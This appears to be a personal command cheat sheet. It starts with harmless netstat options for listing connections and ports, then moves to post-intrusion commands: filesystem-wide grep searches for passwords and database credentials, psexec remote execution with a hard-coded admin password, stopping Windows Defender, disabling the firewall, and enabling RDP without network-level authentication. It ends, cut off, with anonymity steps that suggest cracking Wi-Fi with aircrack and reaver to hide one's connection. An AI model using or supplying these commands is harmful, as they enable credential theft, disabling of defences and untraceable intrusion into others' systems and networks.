netstat -c –Continuous output
netstat -r –Displays routing table
netstat -ie –Network Interfaces
Displaying all Connections
netstat -a
Displaying all TCP
netstat -at
Displaying all UDP
netstat -au
Displaying all listening TCP Ports
netstat -lt
Displaying all listening UDP Ports
netstat -lu
Process Identification
netstat -p
netstat -atp –Shows service name
Displaying only listening TCP connections
netstat -tnl
Displaying only listening UDP connections
netstat -unl
Combination: netstat -nlpt –Shows process name and PID
Displaying a particular port
netstat -anp | grep:443
grep -rnw '/' -ie 'pass' --color=always
grep -rnw '/' -ie 'DB_PASS' --color=always
grep -rnw '/' -ie 'DB_PASSWORD' --color=always
grep -rnw '/' -ie 'DB_USER' --color=always
.\psexec64.exe \\192.168.x.x -u .\administrator -p admin@123 cmd.exe
sc stop WinDefend
netsh advfirewall show allprofiles
netsh advfirewall set allprofiles state off
netsh firewall set opmode disable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
1) Make a hidden encrypted volume with Truecrypt 7.1a [0]
2) Inside the encrypted volume install Whonix [1]
3) (Optional) While just having everything go over Tor thanks to Whonix is
probably sufficient, it's better to not use an internet connection connected
to your name or address. A cantenna, aircrack, and reaver can come in handy